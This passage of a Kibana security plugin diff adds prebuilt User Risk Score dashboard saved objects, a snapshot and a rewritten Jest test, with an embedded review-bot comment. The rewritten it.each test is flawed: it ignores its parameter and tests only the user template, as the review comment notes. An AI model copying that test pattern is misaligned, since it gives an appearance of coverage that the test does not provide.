"experimental", + }, + "coreMigrationVersion": "8.3.0", + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#8aa96b", + "description": "", + "name": "release", + }, + "coreMigrationVersion": "8.3.0", + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "This dashboard allows users to drill down further into the details of the risk components associated with a particular user.", + "hits": 0, + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[]}", + }, + "optionsJSON": "{\\"hidePanelTitles\\":false,\\"useMargins\\":true}", + "panelsJSON": "[{\\"version\\":\\"8.3.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":0,\\"w\\":48,\\"h\\":3,\\"i\\":\\"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195\\"},\\"panelIndex\\":\\"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195\\",\\"embeddableConfig\\":{\\"savedVis\\":{\\"title\\":\\"\\",\\"description\\":\\"\\",\\"type\\":\\"markdown\\",\\"params\\":{\\"fontSize\\":12,\\"openLinksInNewTab\\":false,\\"markdown\\":\\"The User Risk Score capability is an experimental feature. 
You can read further about it [here]\\"},\\"uiState\\":{},\\"data\\":{\\"aggs\\":[],\\"searchSource\\":{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[]}}},\\"hidePanelTitles\\":true,\\"enhancements\\":{},\\"type\\":\\"visualization\\"}},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"lens\\",\\"gridData\\":{\\"x\\":0,\\"y\\":3,\\"w\\":48,\\"h\\":15,\\"i\\":\\"b3fdccab-59c1-47c8-9393-fa043e0dff83\\"},\\"panelIndex\\":\\"b3fdccab-59c1-47c8-9393-fa043e0dff83\\",\\"embeddableConfig\\":{\\"enhancements\\":{}},\\"panelRefName\\":\\"panel_b3fdccab-59c1-47c8-9393-fa043e0dff83\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":18,\\"w\\":26,\\"h\\":65,\\"i\\":\\"8d09b97c-a023-4b7e-9e9d-1c46e726a487\\"},\\"panelIndex\\":\\"8d09b97c-a023-4b7e-9e9d-1c46e726a487\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"593ff0e6-25da-47ad-b81d-9a0106c0e9aa\\",\\"triggers\\":[\\"VALUE_CLICK_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"URL_DRILLDOWN\\",\\"name\\":\\"Go to User View\\",\\"config\\":{\\"url\\":{\\"template\\":\\"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}\\"},\\"openInNewTab\\":true,\\"encodeUrl\\":true}}}]}},\\"hidePanelTitles\\":false,\\"vis\\":{\\"params\\":{\\"colWidth\\":[{\\"colIndex\\":0,\\"width\\":410.5}]}}},\\"title\\":\\"Alert Counts by User\\",\\"panelRefName\\":\\"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":26,\\"y\\":18,\\"w\\":22,\\"h\\":65,\\"i\\":\\"cae82aa1-20c8-4354-94ab-3934ac53b8fe\\"},\\"panelIndex\\":\\"cae82aa1-20c8-4354-94ab-3934ac53b8fe\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"0fd43778-bd5d-4b2b-85c3-47ac3b756434\\",\\"triggers\\":[\\"VALUE_CLICK_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"URL_DRILLDOWN\\",\\"name\\":\\"Go to User 
View\\",\\"config\\":{\\"url\\":{\\"template\\":\\"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}\\"},\\"openInNewTab\\":true,\\"encodeUrl\\":true}}}]}},\\"hidePanelTitles\\":false,\\"vis\\":{\\"params\\":{\\"colWidth\\":[{\\"colIndex\\":0,\\"width\\":304}]}}},\\"title\\":\\"Alert Counts by Host\\",\\"panelRefName\\":\\"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe\\"},{\\"version\\":\\"8.0.0\\",\\"type\\":\\"visualization\\",\\"gridData\\":{\\"x\\":0,\\"y\\":83,\\"w\\":48,\\"h\\":15,\\"i\\":\\"ca3c8903-be5d-4265-820c-cc3d67443af2\\"},\\"panelIndex\\":\\"ca3c8903-be5d-4265-820c-cc3d67443af2\\",\\"embeddableConfig\\":{\\"enhancements\\":{}},\\"panelRefName\\":\\"panel_ca3c8903-be5d-4265-820c-cc3d67443af2\\"}]", + "timeRestore": false, + "title": "Drilldown of User Risk Score", + "version": 1, + }, + "coreMigrationVersion": "8.3.0", + "id": "1355b030-ca2b-11ec-962f-a3a018b7d10f", + "migrationVersion": Object { + "dashboard": "8.3.0", + }, + "references": Array [ + Object { + "id": "60454070-9a5d-11ec-9633-5f782d122340", + "name": "b3fdccab-59c1-47c8-9393-fa043e0dff83:panel_b3fdccab-59c1-47c8-9393-fa043e0dff83", + "type": "lens", + }, + Object { + "id": "a62d3ed0-cf92-11eb-a0ff-1763d16cbda7", + "name": "8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487", + "type": "visualization", + }, + Object { + "id": "42371d00-cf7a-11eb-9a96-05d89f94ad96", + "name": "cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe", + "type": "visualization", + }, + Object { + "id": "183d32f0-9a5e-11ec-90d3-1109ed409ab5", + "name": "ca3c8903-be5d-4265-820c-cc3d67443af2:panel_ca3c8903-be5d-4265-820c-cc3d67443af2", + "type": "visualization", + }, + Object { + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "name": "tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "type": "tag", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + 
}, + Object { + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "name": "tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "type": "tag", + }, + ], + "type": "dashboard", + "updated_at": "2022-06-22T21:55:26.622Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "6a98e860-f264-11ec-b875-8dd104de3c0f", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T19:49:24.075Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{\\"user.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": "ml_user_risk_score_latest_default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "state": Object { + "datasourceStates": Object { + "indexpattern": Object { + "layers": Object { + "4fd27c60-031c-4cd6-9cc3-42eba11e4dc5": Object { + "columnOrder": Array [ + "a56deeb6-7001-42a3-80bf-d0d4cd389864", + "f78c300e-883b-469b-bc12-c1bd1a3567c9", + "d54be677-903e-45f4-8218-8e21fbcc692e", + ], + "columns": Object { + "a56deeb6-7001-42a3-80bf-d0d4cd389864": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top values of user.name", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "type": "column", + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": Object { + "id": "terms", + }, + "size": 100, + }, + "scale": "ordinal", + 
"sourceField": "user.name", + }, + "d54be677-903e-45f4-8218-8e21fbcc692e": Object { + "dataType": "number", + "isBucketed": false, + "label": "Sum of risk_stats.risk_score", + "operationType": "sum", + "scale": "ratio", + "sourceField": "risk_stats.risk_score", + }, + "f78c300e-883b-469b-bc12-c1bd1a3567c9": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top values of risk.keyword", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "type": "column", + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": Object { + "id": "terms", + }, + "size": 3, + }, + "scale": "ordinal", + "sourceField": "risk.keyword", + }, + }, + "incompleteColumns": Object {}, + }, + }, + }, + }, + "filters": Array [ + Object { + "$state": Object { + "store": "appState", + }, + "meta": Object { + "alias": null, + "disabled": false, + "index": "915f434c-c7d6-4813-be8a-620ce7b2bfab", + "key": "risk.keyword", + "negate": true, + "params": Object { + "query": "Unknown", + }, + "type": "phrase", + }, + "query": Object { + "match_phrase": Object { + "risk.keyword": "Unknown", + }, + }, + }, + ], + "query": Object { + "language": "kuery", + "query": "", + }, + "visualization": Object { + "columns": Array [ + Object { + "columnId": "a56deeb6-7001-42a3-80bf-d0d4cd389864", + "isTransposed": false, + }, + Object { + "columnId": "f78c300e-883b-469b-bc12-c1bd1a3567c9", + "isTransposed": false, + }, + Object { + "columnId": "d54be677-903e-45f4-8218-8e21fbcc692e", + "hidden": true, + "isTransposed": false, + }, + ], + "layerId": "4fd27c60-031c-4cd6-9cc3-42eba11e4dc5", + "layerType": "data", + "rowHeight": "single", + "rowHeightLines": 1, + }, + }, + "title": "Current Risk Score For Users", + "visualizationType": "lnsDatatable", + }, + "coreMigrationVersion": "8.3.0", + "id": "3b1fd7f0-d52d-11ec-b370-e3adc339bc8c", + "migrationVersion": Object { + "lens": "8.3.0", + }, + 
"references": Array [ + Object { + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "name": "indexpattern-datasource-layer-4fd27c60-031c-4cd6-9cc3-42eba11e4dc5", + "type": "index-pattern", + }, + Object { + "id": "0edd6710-cfd4-11ec-962f-a3a018b7d10f", + "name": "915f434c-c7d6-4813-be8a-620ce7b2bfab", + "type": "index-pattern", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-ref-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + ], + "type": "lens", + "updated_at": "2022-06-22T22:07:54.553Z", + }, + Object { + "attributes": Object { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[{\\"meta\\":{\\"negate\\":true,\\"type\\":\\"phrase\\",\\"key\\":\\"risk.keyword\\",\\"params\\":{\\"query\\":\\"Unknown\\"},\\"disabled\\":true,\\"alias\\":null,\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\\"},\\"query\\":{\\"match_phrase\\":{\\"risk.keyword\\":\\"Unknown\\"}},\\"$state\\":{\\"store\\":\\"appState\\"}}]}", + }, + "optionsJSON": "{\\"useMargins\\":true,\\"syncColors\\":false,\\"hidePanelTitles\\":false}", + "panelsJSON": "[{\\"version\\":\\"8.0.0\\",\\"type\\":\\"lens\\",\\"gridData\\":{\\"x\\":11,\\"y\\":0,\\"w\\":25,\\"h\\":32,\\"i\\":\\"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\"},\\"panelIndex\\":\\"359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\",\\"embeddableConfig\\":{\\"enhancements\\":{\\"dynamicActions\\":{\\"events\\":[{\\"eventId\\":\\"299d13ec-93f5-48ce-a98d-cf7aeeca37d6\\",\\"triggers\\":[\\"FILTER_TRIGGER\\"],\\"action\\":{\\"factoryId\\":\\"DASHBOARD_TO_DASHBOARD_DRILLDOWN\\",\\"name\\":\\"Go to Dashboard\\",\\"config\\":{\\"useCurrentFilters\\":true,\\"useCurrentDateRange\\":true}}}]}}},\\"panelRefName\\":\\"panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6\\"}]", + "timeRestore": false, + "title": "Current Risk Score For Users", + "version": 1, + }, + "coreMigrationVersion": 
"8.3.0", + "id": "065c6df0-d530-11ec-b370-e3adc339bc8c", + "migrationVersion": Object { + "dashboard": "8.3.0", + }, + "references": Array [ + Object { + "id": "6a98e860-f264-11ec-b875-8dd104de3c0f", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern", + }, + Object { + "id": "3b1fd7f0-d52d-11ec-b370-e3adc339bc8c", + "name": "359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:panel_359e8a84-bc4a-4c1d-ab11-5fc73f6769a6", + "type": "lens", + }, + Object { + "id": "1355b030-ca2b-11ec-962f-a3a018b7d10f", + "name": "359e8a84-bc4a-4c1d-ab11-5fc73f6769a6:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:299d13ec-93f5-48ce-a98d-cf7aeeca37d6:dashboardId", + "type": "dashboard", + }, + Object { + "id": "1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "name": "tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94", + "type": "tag", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + Object { + "id": "2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "name": "tag-2d22b2c0-feb0-11eb-bac9-4d64e825480b", + "type": "tag", + }, + ], + "type": "dashboard", + "updated_at": "2022-06-22T21:55:26.622Z", + }, +] +`; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts index 3c111c45b1621..caeae258f5070 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/create_prebuilt_saved_objects.test.ts 
@@ -13,7 +13,6 @@ import {
   requestMock,
 } from '../../detection_engine/routes/__mocks__';
 import { getEmptySavedObjectsResponse } from '../../detection_engine/routes/__mocks__/request_responses';
-import { expectedSavedObjectTemplate } from '../mocks';
 import { createPrebuiltSavedObjectsRoute } from './create_prebuilt_saved_objects';
 
 const createPrebuiltSavedObjectsRequest = (savedObjectTemplate: string) =>
@@ -47,16 +46,18 @@ describe('createPrebuiltSavedObjects', () => {
     createPrebuiltSavedObjectsRoute(server.router, securitySetup);
   });
 
-  test('should create saved objects from given template', async () => {
-    const response = await server.inject(
-      createPrebuiltSavedObjectsRequest('hostRiskScoreDashboards'),
-      requestContextMock.convertContext(context)
-    );
-
-    expect(clients.savedObjectsClient.bulkCreate).toHaveBeenCalledWith(
-      expectedSavedObjectTemplate,
-      { overwrite: true }
-    );
-    expect(response.status).toEqual(200);
-  });
+  it.each([['hostRiskScoreDashboards', 'userRiskScoreDashboards']])(
+    'should create saved objects from given template - %p',
+    async () => {
+      const response = await server.inject(
+        createPrebuiltSavedObjectsRequest('userRiskScoreDashboards'),
+        requestContextMock.convertContext(context)
+      );
+
+      expect(clients.savedObjectsClient.bulkCreate.mock.calls[0][1]).toEqual({ overwrite: true });
+      expect(clients.savedObjectsClient.bulkCreate.mock.calls[0][0]).toMatchSnapshot();
+
+      expect(response.status).toEqual(200);
+    }
+  );
 });
diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts
index c4ed59354c720..54fb29df07ec9 100644
--- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts
+++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/index.ts
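Review bot: The `it.each` table in the second hunk is a single row, `[['hostRiskScoreDashboards', 'userRiskScoreDashboards']]`, and the callback takes no parameter while hard-coding `createPrebuiltSavedObjectsRequest('userRiskScoreDashboards')`, so the host template is no longer exercised at all and the one snapshot it records is labelled `"hostRiskScoreDashboards"` while holding the user-risk objects (its lens titles read "User Risk Score …"). Flatten the table to `it.each(['hostRiskScoreDashboards', 'userRiskScoreDashboards'])(` and bind the value: `async (savedObjectTemplate) => {` with `createPrebuiltSavedObjectsRequest(savedObjectTemplate),`. Both cases then read `bulkCreate.mock.calls[0]`, which is only correct if the mock is reset between them; the `beforeEach` that builds `clients` is outside this hunk, so confirm it does. The `describe` callback continues outside the hunk.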
@@ -5,3 +5,4 @@
  * 2.0.
  */
 export { hostRiskScoreDashboards } from './host_risk_score_dashboards';
+export { userRiskScoreDashboards } from './user_risk_score_dashboards';
diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts
new file mode 100644
index 0000000000000..0b72f1d3e7698
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/saved_object/user_risk_score_dashboards.ts
@@ -0,0 +1,528 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import type { SavedObject } from '@kbn/core/types'; + +export const userRiskScoreDashboards: SavedObject[] = [ + { + attributes: { + fieldAttrs: + '{"kibana.alert.rule.name":{"count":2},"signal.rule.name":{"count":2},"signal.rule.risk_score":{"count":2},"signal.rule.type":{"count":1},"host.os.family":{"count":1},"host.os.full":{"count":1},"host.os.name":{"count":1},"host.os.platform":{"count":1},"host.os.version":{"count":1},"signal.rule.rule_id":{"count":2},"signal.rule.threat.tactic.id":{"count":2},"host.id":{"count":1},"host.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: 'd3ae2f80-fbc1-11eb-bac9-4d64e825480b', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#32057a', description: '', name: 'ueba' }, + coreMigrationVersion: '8.3.0', + id: '14104360-2534-11ec-ad40-03fece8605c9', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + state: { + datasourceStates: { + indexpattern: { + layers: { + 'b885eaad-3c68-49ad-9891-70158d912dbd': { + columnOrder: [ + '1fced52d-7ba5-4254-8656-fe0d7ced586a', + 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', + '1d9b32cd-62d9-44e5-bf43-109011adc714', + '1d9b32cd-62d9-44e5-bf43-109011adc714X0', + '1d9b32cd-62d9-44e5-bf43-109011adc714X1', + ], + columns: { + '1d9b32cd-62d9-44e5-bf43-109011adc714': { + dataType: 'number', + isBucketed: false, + label: 'cumulative_sum(sum(signal.rule.risk_score))', + operationType: 
'formula', + params: { + formula: 'cumulative_sum(sum(signal.rule.risk_score))', + isFormulaBroken: false, + }, + references: ['1d9b32cd-62d9-44e5-bf43-109011adc714X1'], + scale: 'ratio', + }, + '1d9b32cd-62d9-44e5-bf43-109011adc714X0': { + customLabel: true, + dataType: 'number', + isBucketed: false, + label: 'Part of cumulative_sum(sum(signal.rule.risk_score))', + operationType: 'sum', + params: { emptyAsNull: false }, + scale: 'ratio', + sourceField: 'signal.rule.risk_score', + }, + '1d9b32cd-62d9-44e5-bf43-109011adc714X1': { + customLabel: true, + dataType: 'number', + isBucketed: false, + label: 'Part of cumulative_sum(sum(signal.rule.risk_score))', + operationType: 'cumulative_sum', + references: ['1d9b32cd-62d9-44e5-bf43-109011adc714X0'], + scale: 'ratio', + }, + '1fced52d-7ba5-4254-8656-fe0d7ced586a': { + dataType: 'string', + isBucketed: true, + label: 'Top 30 values of user.name', + operationType: 'terms', + params: { + missingBucket: false, + orderBy: { fallback: true, type: 'alphabetical' }, + orderDirection: 'asc', + otherBucket: false, + parentFormat: { id: 'terms' }, + size: 30, + }, + scale: 'ordinal', + sourceField: 'user.name', + }, + 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a': { + dataType: 'date', + isBucketed: true, + label: '@timestamp', + operationType: 'date_histogram', + params: { includeEmptyRows: true, interval: '1d' }, + scale: 'interval', + sourceField: '@timestamp', + }, + }, + incompleteColumns: {}, + }, + }, + }, + }, + filters: [], + query: { language: 'kuery', query: 'not user.name: SYSTEM' }, + visualization: { + layers: [ + { + accessors: ['1d9b32cd-62d9-44e5-bf43-109011adc714'], + layerId: 'b885eaad-3c68-49ad-9891-70158d912dbd', + layerType: 'data', + position: 'top', + seriesType: 'bar_stacked', + showGridlines: false, + splitAccessor: '1fced52d-7ba5-4254-8656-fe0d7ced586a', + xAccessor: 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', + }, + ], + legend: { isVisible: true, legendSize: 'auto', position: 'right' }, + preferredSeriesType: 
'bar_stacked', + title: 'Empty XY chart', + valueLabels: 'hide', + yLeftExtent: { mode: 'full' }, + yRightExtent: { mode: 'full' }, + }, + }, + title: 'User Risk Score (Max Risk Score Histogram)', + visualizationType: 'lnsXY', + }, + coreMigrationVersion: '8.3.0', + id: '60454070-9a5d-11ec-9633-5f782d122340', + migrationVersion: { lens: '8.3.0' }, + references: [ + { + id: 'd3ae2f80-fbc1-11eb-bac9-4d64e825480b', + name: 'indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd', + type: 'index-pattern', + }, + { + id: '14104360-2534-11ec-ad40-03fece8605c9', + name: 'tag-ref-14104360-2534-11ec-ad40-03fece8605c9', + type: 'tag', + }, + ], + type: 'lens', + updated_at: '2022-06-22T22:06:12.160Z', + }, + { + attributes: { + fieldAttrs: + '{"signal.rule.type":{"count":1},"host.name":{"count":1},"signal.rule.name":{"count":1}}', + fields: '[]', + runtimeFieldMap: '{}', + timeFieldName: '@timestamp', + title: '.siem-signals-', + typeMeta: '{}', + }, + coreMigrationVersion: '8.3.0', + id: 'siem-signals-default-index-pattern', + migrationVersion: { 'index-pattern': '8.0.0' }, + references: [], + type: 'index-pattern', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"user.name: root","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'Associated Users (Rule Breakdown)', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"Associated Users (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score","emptyAsNull":false},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of 
Hits","emptyAsNull":false},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"User"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":25,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true,"autoFitRowToContent":true}}', + }, + coreMigrationVersion: '8.3.0', + id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T22:01:24.771Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'Alerts by Hostname', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"Host Risk Score (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of 
Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', + }, + coreMigrationVersion: '8.3.0', + id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { + description: '', + kibanaSavedObjectMeta: { + searchSourceJSON: + '{"query":{"query":"not user.name : *$","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', + }, + title: 'User Risk Score (Tactic Breakdown)- Verbose', + uiStateJSON: '{}', + version: 1, + visState: + '{"title":"User Risk Score (Tactic Breakdown)- Verbose","type":"table","aggs":[{"id":"1","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk 
Score"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"1","order":"desc","size":40,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Username"},"schema":"split"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.tactic.name","orderBy":"1","order":"desc","size":100,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Tactic"},"schema":"bucket"},{"id":"6","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.technique.name","orderBy":"1","order":"desc","size":100,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Technique"},"schema":"bucket"},{"id":"7","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true,"autoFitRowToContent":false}}', + }, + coreMigrationVersion: '8.3.0', + id: '183d32f0-9a5e-11ec-90d3-1109ed409ab5', + migrationVersion: { visualization: '8.3.0' }, + references: [ + { + id: 'siem-signals-default-index-pattern', + name: 'kibanaSavedObjectMeta.searchSourceJSON.index', + type: 'index-pattern', + }, + ], + type: 'visualization', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#D36086', description: '', name: 'experimental' }, + coreMigrationVersion: '8.3.0', + id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: '2022-06-22T21:55:25.560Z', + }, + { + attributes: { color: '#8aa96b', description: '', name: 'release' }, + coreMigrationVersion: '8.3.0', + id: '2d22b2c0-feb0-11eb-bac9-4d64e825480b', + migrationVersion: { tag: '8.0.0' }, + references: [], + type: 'tag', + updated_at: 
